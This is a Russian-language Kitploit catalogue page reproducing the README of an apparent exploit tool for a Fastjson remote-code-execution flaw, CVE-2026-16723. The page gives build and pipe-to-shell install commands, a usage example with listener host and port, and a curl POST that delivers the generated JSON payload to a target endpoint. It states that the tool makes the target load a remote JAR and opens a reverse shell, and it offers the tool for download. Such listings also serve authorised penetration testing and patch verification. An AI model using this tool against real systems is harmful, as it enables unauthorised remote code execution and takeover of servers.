Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-16723 — Эксплойт для Fastjson RCE (CVE-2026-16723), нацеленный на версии с 1.2.68 по 1.2.83. Генерирует JAR- и JSON-пейлоады, запускает HTTP-сервер и устанавливает reverse shell. | Kitploit
Инструменты/GitHubGitHub/nowafen/cve-2026-16723
Генерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubnowafen/cve-2026-16723

CVE-2026-16723

Эксплойт для Fastjson RCE (CVE-2026-16723), нацеленный на версии с 1.2.68 по 1.2.83. Генерирует JAR- и JSON-пейлоады, запускает HTTP-сервер и устанавливает reverse shell.

Репозиторий
24 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойт для CVE-2026-16723

Автономная реализация на C++17 для CVE-2026-16723 — критической уязвимости, затрагивающей Fastjson версии 1.2.68 – 1.2.83.


Требования

  • Linux (или WSL в Windows)

  • Компилятор с поддержкой C++17 (GCC 7+ или Clang 5+)

  • CMake 3.10 или новее

  • Системные пакеты:

    • libzip-dev
    • zlib1g-dev

Debian / Ubuntu

root@kitploit:~
sudo apt update
sudo apt install -y build-essential cmake libzip-dev zlib1g-dev

Установка

Быстрая установка (рекомендуется)

Всё устанавливается одной командой:

root@kitploit:~
curl -sSL https://raw.githubusercontent.com/yourusername/CVE-2026-16723/main/install.sh | bash

Или загрузите и выполните установщик вручную:

root@kitploit:~
wget https://raw.githubusercontent.com/yourusername/CVE-2026-16723/main/install.sh
chmod +x install.sh
./install.sh

Скрипт установки:

  • Установит все необходимые системные пакеты.

  • Загрузит требуемые библиотеки только с заголовками:

    • nlohmann/json
    • cpp-httplib
  • Соберёт проект.

  • Поместит скомпилированный бинарный файл в текущий каталог как:

root@kitploit:~
./exploit

Ручная сборка

Если вы склонировали репозиторий:

root@kitploit:~
git clone https://github.com/yourusername/CVE-2026-16723.git
cd CVE-2026-16723
./install.sh

Или соберите вручную:

root@kitploit:~
mkdir build
cd build

cmake ..
make -j$(nproc)

cp exploit ../

Использование

Запустите бинарный файл:

root@kitploit:~
./exploit --lhost <YOUR_IP> --lport <SHELL_PORT> [options]

Пример

root@kitploit:~
./exploit --lhost 192.168.1.100 --lport 4444 --http-port 8000

После выполнения будут созданы следующие файлы:

root@kitploit:~
x
body.json

HTTP-сервер запустится на указанном порту (по умолчанию: 8000), и инструмент будет ожидать входящее reverse shell-подключение.


Отправка полезной нагрузки

Отправьте сгенерированный файл body.json на уязвимую конечную точку:

root@kitploit:~
curl -X POST http://<TARGET_IP>:8080/api/products/search \
     -H "Content-Type: application/json" \
     --data-binary @body.json

Если приложение ожидает другое JSON-поле, укажите его с помощью опции --field.


Параметры командной строки


Выходные файлы

ФайлОписание
xСгенерированная JAR-полезная нагрузка
body.jsonJSON-полезная нагрузка для отправки цели

Примечания

  • Этот проект предназначен только для авторизованного тестирования безопасности и образовательных целей.
  • Реализация принуждает целевое приложение загружать и подключать удалённый JAR с использованием протоколов jar:http и jar:file.
  • Команда reverse shell кодируется в Base64, чтобы уменьшить проблемы с экранированием.

Следуйте за мной в Twitter(X)

  • MNM
Скачать инструмент
ПараметрОписаниеПо умолчанию
--lhostЛокальный IP-адресОбязательно
--lportПорт прослушивания reverse shell4444
--http-portПорт HTTP-сервера8000
--firstПервый файловый дескриптор для проверки3
--lastПоследний файловый дескриптор для проверки30
--fieldИмя JSON-поляfacets
--outdirВыходной каталог.
-h, --helpПоказать справку—